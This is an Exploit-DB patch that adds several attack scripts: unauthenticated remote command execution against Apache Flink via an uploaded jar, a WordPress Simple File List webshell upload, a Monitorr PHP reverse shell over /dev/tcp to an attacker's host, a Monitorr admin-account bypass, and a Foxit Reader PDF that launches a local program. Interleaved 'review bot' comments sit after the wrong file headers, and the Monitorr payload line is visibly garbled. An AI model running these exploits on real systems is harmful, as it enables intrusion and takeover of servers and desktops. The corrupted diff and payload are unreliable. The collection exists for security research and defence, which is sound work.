From 3cad5bf9ad417175e12cb1556824cfaf763a2ac6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 3 Nov 2020 05:02:04 +0000
Subject: [PATCH] DB: 2020-11-03
6 changes to exploits/shellcodes
Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)
Quick N Easy FTP Service 3.2 - Unquoted Service Path
Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
WordPress Plugin Simple File List 5.4 - Arbitrary File Upload
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
Monitorr 1.7.6m - Authorization Bypass
---
exploits/java/webapps/48978.py | 139 +++++++++++++++++++++++++++++++
exploits/php/webapps/48979.py | 99 ++++++++++++++++++++++
exploits/php/webapps/48980.py | 29 +++++++
exploits/php/webapps/48981.py | 25 ++++++
exploits/windows/local/48982.pdf | 139 +++++++++++++++++++++++++++++++
exploits/windows/local/48983.txt | 31 +++++++
files_exploits.csv | 6 ++
7 files changed, 468 insertions(+)
create mode 100755 exploits/java/webapps/48978.py
create mode 100755 exploits/php/webapps/48979.py
create mode 100755 exploits/php/webapps/48980.py
create mode 100755 exploits/php/webapps/48981.py
create mode 100644 exploits/windows/local/48982.pdf
create mode 100644 exploits/windows/local/48983.txt
diff --git a/exploits/java/webapps/48978.py b/exploits/java/webapps/48978.py
new file mode 100755
index 000000000..70c8bd635
--- /dev/null
+++ b/exploits/java/webapps/48978.py
@@ -0,0 +1,139 @@
+#!/usr/bin/env python3
+# _*_ coding: utf-8 _*_
+
+# Exploit Title: Apache Flink 1.9.x - File Upload RCE (Unauthenticated)
+# Google Dork: None
+# Date: 2020.11.01
+# Exploit Author: bigger.wing
+# Vendor Homepage: https://flink.apache.org/
+# Software Link: https://flink.apache.org/downloads.html
+# Version: 1.9.x
+# Tested on: Centos7.x, 1.9.1
+# CVE: None
+
+import io
+import re
+import sys
+import base64
+import requests
+
+
+class FlinkRCECheck:
+
+ def __init__(self, url):
+ self.url = url
+ self.timeout = 10
+ self.upload_file = 'rce_check_from_sec.jar'
+ self.headers = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
+ 'Chrome/61.0 Safari/537.36'
+ }
+
+ @property
+ def get_version(self):
+ url = '%s/%s' % (self.url, 'config')
+ try:
+ res = requests.get(url, headers=self.headers, timeout=self.timeout, verify=False)
+ version = res.json().get('flink-version')
+ except:
+ version = 'unknown'
+ return version
+
+ @property
+ def jar_check(self):
+ url = '%s/%s' % (self.url, 'jars')
+ jar_list = []
+ try:
+ res = requests.get(url, headers=self.headers, verify=False, timeout=self.timeout)
+ if res.status_code == 200 and 'application/json' in res.headers.get('Content-Type', ''):
+ res = res.json()
+ for file in res['files']:
+ if file['id'].endswith(self.upload_file):
+ jar_list.append(file['id'])
+ except Exception as e:
+ pass
+
+ return jar_list
+
+ @property
+ def jar_upload(self):
+ url = '%s/%s' % (self.url, 'jars/upload')
+ jar_content = base64.b64decode('UEsDBBQACAgIACJ1bU8AAAAAAAAAAAAAAAAUAAQATUVUQS1JTkYvTUFOSUZFU1QuTUb+ygAA803My'
+ '0xLLS7RDUstKs7Mz7NSMNQz4OXyTczM03XOSSwutlJwrUhNLi1J5eXi5QIAUEsHCIiKCL8wAAAALg'
+ 'AAAFBLAwQKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAE1FVEEtSU5GL1BLAwQUAAgICAAidW1PAAA'
+ 'AAAAAAAAAAAAADQAAAEV4ZWN1dGUuY2xhc3ONVet2E1UU/k4yyUwmQy+TQlsQBdSStqSxiIotIlAK'
+ 'VkJbSa0G8DKZHpPTJjNhLjTVCvoQ/ugT8MsfqCtx0aUPwEOx3Gdo09KGtUzW7H3O3vvbt7PPzPMXz'
+ '/4FMIlfdbyDyxo+1XBFx1Vc05HCjIbrks+quKHipobPNMzp0PC5hlsqChpu6+jBvCQLGhal6gsVd3'
+ 'QUsaRjAF9qWJb8K0m+lqQkyd0URbin4r6OkzLoN5J/K8l3Or6HpaKswmZIXhKOCC4zxLOjywzKjLv'
+ 'CGXoLwuHzYb3MvSWrXCOJWXBtq7ZseULud4RKUBU+Q6ow2+R2GPBpEtUt4TAcy94rrFoPrXzNcir5'
+ 'YuAJpzItA7AGw/F9qkXPtbnvXwtFbYV75CDeCDZkuENo8m15FQqX6eKaHLuEtesrtJI2h0NIG7ujC'
+ 'QNRyxdty3GiqPps0+aNQLiOr4J86EU39Gx+Q8gyjZ3yJiTSwLsYYQCD6voTjlXnKriBH1AxUIWgJN'
+ 'aFY2AVawxDr6uToe9gCeSPsp/gTQoYy9syTI5k+bJw8n6VkogAws2/zCkVKcqWX5WWNQN1UNtjOQK'
+ '6oB73H6pSxQMDHnxpH5Dp/asGQjw0sA7KtwlhYAMjBn7ETwyDB9PrJB7fvLJpYBM/G3gEoeKxgV9Q'
+ 'o0x3mvRKaQvlVW5TsMyeqNPoV3uw4Qe8zpCu8IBa1eCenIKRbJch6nb46cAtuOvcm7F8SmAg29VIs'
+ '10noOmk8Tix3/FM1fKK/EHIHZtPj95lONotLM1ukjeFH/jRXSGzhB9YXiDNR7tOW/8hIUMP1TfnNM'
+ 'KA3HKLCh7cBdPJ7lMQfCjbVSETMUKfX+c1UReBPJKzr2/TgTFXq5Y/z5uUtOJELGHXXNmyuBvKSjo'
+ 'RF8nJXipJq9HgDl2L3P86kL3LrAXu7nRnurim+A25w2m8Te9G+YvRxaILRvQs7fLE6a4hMdYGexqp'
+ 's0STkZBhlKjx0gBjGCeewjnkyIrAbInskiT7y4wVxuLnb5vxv6G0kDCTLahbOLUNrZT8B6lS3NSLJ'
+ 'cVMF0uJc8U2jPknuGAemVK20VMye9voa6F/C6rZK0W7mGFFYswOJtdCRuoHSsMU5Ggbx8zBFoamEs'
+ 'OJFoa3kJb8+BMo4wW5OvEH3tjGyVIbb5pvtXBqnJ5o0cLpFs7s1fohjhCN01+BSvUMEr1AdV6Ejpt'
+ 'I4xbpOXqxhj66kP34DSb+RCbqzR36WEwScoIaGSdEDu/RXpE9wXm8H/l9St4m5dsMv+MDWsXI28IO'
+ 'Yg1zFP8jQjwifhEfU5+nCKWQ/TQ9l6IsP/kPUEsHCEEOnKXWAwAA4gYAAFBLAQIUABQACAgIACJ1b'
+ 'U+Iigi/MAAAAC4AAAAUAAQAAAAAAAAAAAAAAAAAAABNRVRBLUlORi9NQU5JRkVTVC5NRv7KAABQSw'
+ 'ECCgAKAAAIAAAidW1PAAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAB2AAAATUVUQS1JTkYvUEsBAhQ'
+ 'AFAAICAgAInVtT0EOnKXWAwAA4gYAAA0AAAAAAAAAAAAAAAAAnQAAAEV4ZWN1dGUuY2xhc3NQSwUG'
+ 'AAAAAAMAAwC4AAAArgQAAAAA')
+ files = {'jarfile': (self.upload_file, io.BytesIO(jar_content), 'application/octet-stream')}
+
+ try:
+ res = requests.post(url, headers=self.headers, files=files, timeout=self.timeout, verify=False)
+ file_id = res.json()['filename'].split('/')[-1]
+ return file_id
+ except Exception as e:
+ res = False
+ return res
+
+ @property
+ # delete history jar packages
+ def jar_delete(self):
+ for jar_name in self.jar_check:
+ url = '%s//jars/%s' % (self.url, jar_name)
+ try:
+ requests.delete(url=url, headers=self.headers, timeout=self.timeout, verify=False)
+ except:
+ pass
+ return
+
+ def rce(self, command):
+ jar_file = self.jar_upload
+ try:
+ execute_cmd_url = '%s/jars/%s/run?entry-class=Execute&program-args="%s"' % (self.url, jar_file, command)
+ res = requests.post(url=execute_cmd_url, headers=self.headers, timeout=self.timeout, verify=False)
+ res = re.findall('\|@\|(.*?)\|@\|', res.text)[0][0:-2]
+ if res:
+ print('rce command "%s" exec result: %s' % (command, res))
+ state = 1
+ msg = '%s rce success' % self.url
+ else:
+ state = 0
+ msg = '%s rce failed' % self.url
+ except:
+ state = 0
+ msg = '%s rce failed' % self.url
+
+ delete = self.jar_delete
+
+ return {'state': state, 'version': self.get_version, 'msg': msg}
+
+
+if __name__ == '__main__':
+ usage = 'python3 script.py ip port command'
+ if len(sys.argv) != 4:
+ print('simple usage: %s' % usage)
+ else:
+ ip = sys.argv[1]
+ port = sys.argv[2]
+ command = sys.argv[3]
+ url = 'http://%s:%s' % (ip, port)
+ res = FlinkRCECheck(url=url).rce(command=command)
+ print(res)
\ No newline at end of file
diff --git a/exploits/php/webapps/48979.py b/exploits/php/webapps/48979.py
new file mode 100755
index 000000000..6381bf6f5
--- /dev/null
+++ b/exploits/php/webapps/48979.py
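Review bot: `jar_upload` and `jar_delete` are declared `@property` although both perform network requests with side effects (the multipart POST to `jars/upload`, one DELETE per matching jar), so in `rce()` the line `delete = self.jar_delete` reads as an attribute lookup but issues requests, and `jar_file = self.jar_upload` silently becomes `False` on any failure; making them plain methods would keep the call sites honest. The bare `except:` clauses in `get_version`, `jar_delete` and `rce` also swallow `KeyboardInterrupt`/`SystemExit` and fold every failure (connection refused, non-JSON body, the `IndexError` from `re.findall(...)[0]` when the response carries no `|@|` marker) into the same `rce failed` message; `except requests.RequestException:` plus a printed cause would preserve the diagnosis. Every call passes `verify=False` without a `urllib3.disable_warnings()`, so each request emits an `InsecureRequestWarning`. For triage the relevant fact is that the script sends no credentials at all — it drives only the `jars/upload` and `jars/<id>/run` REST endpoints — which is consistent with `# CVE: None` and means exposure of the dashboard port itself is the condition to detect and close.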
@@ -0,0 +1,99 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload
+# Date: 2020-11-01
+# Exploit Author: H4rk3nz0 based off exploit by coiffeur
+# Original Exploit: https://www.exploit-db.com/exploits/48349
+# Vendor Homepage: https://simplefilelist.com/
+# Software Link: https://wordpress.org/plugins/simple-file-list/ 
+# Version: Wordpress v5.4 Simple File List v4.2.2 
+
+import requests
+import random
+import hashlib
+import sys
+import os
+import urllib3
+urllib3.disable_warnings()
+
+dir_path = '/wp-content/uploads/simple-file-list/'
+upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
+move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'
+file_name = raw_input('[*] Enter File Name (working directory): ')
+protocol = raw_input('[*] Enter protocol (http/https): ')
+http = protocol + '://'
+
+def usage():
+ banner ="""
+USAGE: python simple-file-list-upload.py
+NOTES: Append :port to IP if required.
+ Advise the usage of a webshell as payload. Reverseshell payloads can be hit or miss.
+ """
+ print (banner)
+
+
+def file_select():
+ filename = file_name.split(".")[0]+'.png'
+ with open(file_name) as f:
+ with open(filename, 'w+') as f1:
+ for line in f:
+ f1.write(line)
+ print ('[+] File renamed to ' + filename)
+ return filename
+
+
+def upload(url, filename):
+ files = {'file': (filename, open(filename, 'rb'), 'image/png')}
+ datas = {
+ 'eeSFL_ID': 1,
+ 'eeSFL_FileUploadDir': dir_path,
+ 'eeSFL_Timestamp': 1587258885,
+ 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2',
+ }
+ r = requests.post(url=http + url + upload_path, data=datas,
+ files=files, verify=False)
+ r = requests.get(url=http + url + dir_path + filename, verify=False)
+ if r.status_code == 200:
+ print ('[+] File uploaded at ' + http + url + dir_path + filename)
+ os.remove(filename)
+ else:
+ print ('[-] Failed to upload ' + filename)
+ exit(-1)
+ return filename
+
+
+def move(url, filename):
+ new_filename = filename.split(".")[0]+'.php'
+ headers = {'Referer': http + url + '/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
+ 'X-Requested-With': 'XMLHttpRequest'}
+ datas = {
+ 'eeSFL_ID': 1,
+ 'eeFileOld': filename,
+ 'eeListFolder': '/',
+ 'eeFileAction': 'Rename|'+ new_filename,
+ }
+ r = requests.post(url= http + url + move_path, data=datas,
+ headers=headers, verify=False)
+ if r.status_code == 200:
+ print ('[+] File moved to ' + http + url + dir_path + new_filename)
+ else:
+ print ('[-] Failed to move ' + filename)
+ exit(-1)
+ return new_filename
+
+
+def main(url):
+ file_to_upload = file_select()
+ uploaded_file = upload(url, file_to_upload)
+ moved_file = move(url, uploaded_file)
+ if moved_file:
+ print ('[^-^] Exploit seems to have worked...')
+ print ('\tURL: ' + http + url + dir_path + moved_file)
+
+
+if __name__ == '__main__':
+ if len(sys.argv) < 2:
+ usage()
+ exit(-1)
+
+ main(sys.argv[1])
\ No newline at end of file
diff --git a/exploits/php/webapps/48980.py b/exploits/php/webapps/48980.py
new file mode 100755
index 000000000..ea35ed5b6
--- /dev/null
+++ b/exploits/php/webapps/48980.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+
+# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
+# Date: September 12, 2020
+# Exploit Author: Lyhin's Lab
+# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
+# Software Link: https://github.com/Monitorr/Monitorr
+# Version: 1.7.6m
+# Tested on: Ubuntu 19
+
+import requests
+import os
+import sys
+
+if len (sys.argv) != 4:
+ print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
+else:
+ url = sys.argv[1] + "/assets/php/upload.php"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}
+
+ data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"she_ll.php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"
+
+ requests.post(url, headers=headers, data=data)
+
+ print ("A shell script should be uploaded. Now we try to execute it")
+ url = sys.argv[1] + "/assets/data/usrimg/she_ll.php"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+ requests.get(url, headers=headers)
\ No newline at end of file
diff --git a/exploits/php/webapps/48981.py b/exploits/php/webapps/48981.py
new file mode 100755
index 000000000..13f65e7ba
--- /dev/null
+++ b/exploits/php/webapps/48981.py
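Review bot: The `data = ...` line is corrupted as committed: the text between `GIF89a213213123` and `& /dev/tcp/` is missing while the closing `0>&1'\");` is still present, which is the shape left behind when an HTML renderer strips a `<...>`-delimited span, so the file cannot do what its title describes and the entry should be re-imported from the author's original rather than repaired by hand. The script also discards both responses (`requests.post(...)` and `requests.get(...)`), prints `A shell script should be uploaded` unconditionally and never shows a status code, and `os` is imported but unused. For detection engineering the fixed artefacts in this hunk are useful as they stand: a multipart POST to `/assets/php/upload.php` whose part is named `fileToUpload` with a `.php` filename and an `image/gif` content type, followed by a GET of `/assets/data/usrimg/she_ll.php`.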
@@ -0,0 +1,25 @@
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+
+# Exploit Title: Monitorr 1.7.6m - Authorization Bypass
+# Date: September 12, 2020
+# Exploit Author: Lyhin's Lab
+# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
+# Software Link: https://github.com/Monitorr/Monitorr
+# Version: 1.7.6m
+# Tested on: Ubuntu 19
+
+# Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL.
+
+import requests
+import os
+import sys
+
+if len (sys.argv) != 5:
+ print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password")
+else:
+ url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register"
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"}
+ data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"}
+ requests.post(url, headers=headers, data=data)
+ print ("Done.")
\ No newline at end of file
diff --git a/exploits/windows/local/48982.pdf b/exploits/windows/local/48982.pdf
new file mode 100644
index 000000000..5333f43b1
--- /dev/null
+++ b/exploits/windows/local/48982.pdf
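Review bot: `requests.post(url, headers=headers, data=data)` discards the response, so `Done.` is printed even on a connection error or a non-2xx reply; bind it with `r = requests.post(url, headers=headers, data=data)` and print `r.status_code` so the outcome is visible. `os` is imported but unused. The one-line comment `# Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL.` is the only description of the root cause; the fact a defender needs from this entry is that `/assets/config/_installation/_register.php` is still reachable on an installed instance, so a sentence stating whether removing or blocking the `_installation` directory after setup closes it, and that requests to that path on a deployed instance are worth alerting on, would make the entry more useful than the script alone.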
@@ -0,0 +1,139 @@ +# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) +# Exploit Author: Nassim Asrir +# Vendor Homepage: https://www.foxitsoftware.com/ +# Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. + +The exploit process need the user-interaction (Opening the PDF) . + ++ Process continuation + +#POC + +%PDF-1.4 +%ÓôÌá +1 0 obj +<< +/CreationDate(D:20200821171007+02'00') +/Title(Hi, Can you see me ?) +/Creator(AnonymousUser) +>> +endobj +2 0 obj +<< +/Type/Catalog +/Pages 3 0 R +/Names +<< +/JavaScript 10 0 R +>> +>> +endobj +3 0 obj +<< +/Type/Pages +/Count 1 +/Kids[4 0 R] +>> +endobj +4 0 obj +<< +/Type/Page +/MediaBox[0 0 595 842] +/Parent 3 0 R +/Contents 5 0 R +/Resources +<< +/ProcSet [/PDF/Text/ImageB/ImageC/ImageI] +/ExtGState +<< +/GS0 6 0 R +>> +/Font +<< +/F0 8 0 R +>> +>> +/Group +<< +/CS/DeviceRGB +/S/Transparency +/I false +/K false +>> +>> +endobj +5 0 obj +<< +/Length 94 +/Filter/FlateDecode +>> +stream +xœŠ»@@EûùŠ[RØk ­x•ÄüW"DDç덜âžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔ ÈŒ [ŽãB_5!d§ZhP>¯ ‰ +endstream +endobj +6 0 obj +<< +/Type/ExtGState +/ca 1 +>> +endobj +7 0 obj +<< +/Type/FontDescriptor +/Ascent 833 +/CapHeight 592 +/Descent -300 +/Flags 32 +/FontBBox[-192 -710 702 1221] +/ItalicAngle 0 +/StemV 0 +/XHeight 443 +/FontName/CourierNew,Bold +>> +endobj +8 0 obj +<< +/Type/Font +/Subtype/TrueType +/BaseFont/CourierNew,Bold +/Encoding/WinAnsiEncoding +/FontDescriptor 7 0 R +/FirstChar 0 +/LastChar 255 +/Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] +>> +endobj +9 0 obj +<< +/S/JavaScript +/JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) +>> +endobj +10 0 obj +<< +/Names[(EmbeddedJS)9 0 R] +>> +endobj +xref +0 11 +0000000000 65535 f +0000000015 00000 n +0000000170 00000 n +0000000250 00000 n +0000000305 00000 n +0000000560 00000 n +0000000724 00000 n +0000000767 00000 n +0000000953 00000 n +0000002137 00000 n +0000002235 00000 n +trailer +<< +/ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] +/Info 1 0 R +/Root 2 0 R +/Size 11 +>> +startxref +2283 +%%EOF \ No newline at end of file diff --git a/exploits/windows/local/48983.txt b/exploits/windows/local/48983.txt new file mode 100644 index 000000000..11c17de12 --- /dev/null +++ b/exploits/windows/local/48983.txt 
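Review bot: The header lacks the `# Version:` and `# Tested on:` lines that the other entries in this commit carry; the title says 9.7.1 while the description says `before 10.0`, so a line such as `# Version: < 10.0 (PoC built against 9.7.1)` would remove the ambiguity. The committed file also begins with the `#` comment lines rather than `%PDF-1.4`, so the `xref` offsets (`0000000015` for object 1, `startxref 2283`) no longer point at the objects; readers that trust the table will presumably fall back to scanning, but the header should say the offsets are stale so nobody treats them as authoritative. For detection, the document-level script is registered through the `/Names << /JavaScript 10 0 R >>` name tree and object 9's `/S/JavaScript` action carrying `app.opencPDFWebPage`, so a scanner rule keyed on that API name inside a JavaScript action identifies this PoC without rendering it.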
@@ -0,0 +1,31 @@
+# Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path
+# Discovery by: yunaranyancat
+# Discovery Date: October 2020
+# Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html
+# Software Link : www.pablosoftwaresolutions.com/download.php?id=10
+# Tested Version: 3.2
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 7
+
+# Vulnerability discovery:
+
+Registry value : HKLM\SYSTEM\ControlSet001\Services\Quick 'n Easy FTP Service
+
+# Service info:
+
+C:\>sc qc "Quick 'n Easy FTP Service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Quick 'n Easy FTP Service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 Normal
+ BINARY_PATH_NAME : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Quick 'n Easy FTP Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 59bcaf612..7c8f43cbd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
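Review bot: The `# Exploit:` section asserts code execution with escalated privileges, but the advisory never shows that a standard user can write into `C:\` or `C:\Program Files (x86)\`, the directories the unquoted `BINARY_PATH_NAME` causes the service controller to try first; on default Windows ACLs neither is writable by non-administrators, so as written the impact is unproven. Add the ACL evidence for those two directories (for example `icacls` output) or qualify the sentence to `This vulnerability could permit executing code ... if a low-privileged user can write to a directory along the unquoted path`. The `SERVICE_START_NAME : LocalSystem` and `START_TYPE : 2 AUTO_START` lines are what make the impact SYSTEM-level and triggerable at boot, which is worth saying explicitly rather than leaving to the reader. The registry path `HKLM\SYSTEM\ControlSet001\Services\...` is a numbered control set; `CurrentControlSet` is the conventional reference for the live configuration.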
@@ -10397,6 +10397,8 @@ id,file,description,date,author,type,platform,port
 48966,exploits/windows/local/48966.txt,"Program Access Controller v1.2.0.0 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
 48967,exploits/windows/local/48967.txt,"Prey 1.9.6 - _CronService_ Unquoted Service Path",2020-10-28,"Ömer Tuygun",local,windows,
 48968,exploits/windows/local/48968.txt,"IP Watcher v3.0.0.30 - 'PACService.exe' Unquoted Service Path",2020-10-28,"Mohammed Alshehri",local,windows,
+48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
+48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40796,6 +40798,10 @@ id,file,description,date,author,type,platform,port
 48975,exploits/multiple/webapps/48975.py,"Citadel WebCit < 926 - Session Hijacking Exploit",2020-10-30,"Simone Quatrini",webapps,multiple,
 48976,exploits/php/webapps/48976.txt,"Online Job Portal 1.0 - 'userid' SQL Injection",2020-10-30,"Akıner Kısa",webapps,php,
 48977,exploits/php/webapps/48977.py,"Simple College Website 1.0 - 'username' SQL Injection / Remote Code Execution",2020-10-30,yunaranyancat,webapps,php,
+48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,
+48979,exploits/php/webapps/48979.py,"WordPress Plugin Simple File List 5.4 - Arbitrary File Upload",2020-11-02,H4rk3nz0,webapps,php,
+48980,exploits/php/webapps/48980.py,"Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)",2020-11-02,"Lyhin\'s Lab",webapps,php,
+48981,exploits/php/webapps/48981.py,"Monitorr 1.7.6m - Authorization Bypass",2020-11-02,"Lyhin\'s Lab",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
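Review bot: The two new rows for 48980 and 48981 write the author as `"Lyhin\'s Lab"` with a backslash before the apostrophe inside a double-quoted field; CSV has no backslash escaping, so the author column will read literally as `Lyhin\'s Lab`, which also disagrees with the `# Exploit Author: Lyhin's Lab` header in both scripts. Drop the backslash in both rows: `"Lyhin's Lab"`. The other added rows (48978, 48979 here, 48982 and 48983 in the earlier hunk) follow the file's existing quoting, including the unquoted single-token authors such as `yunaranyancat`.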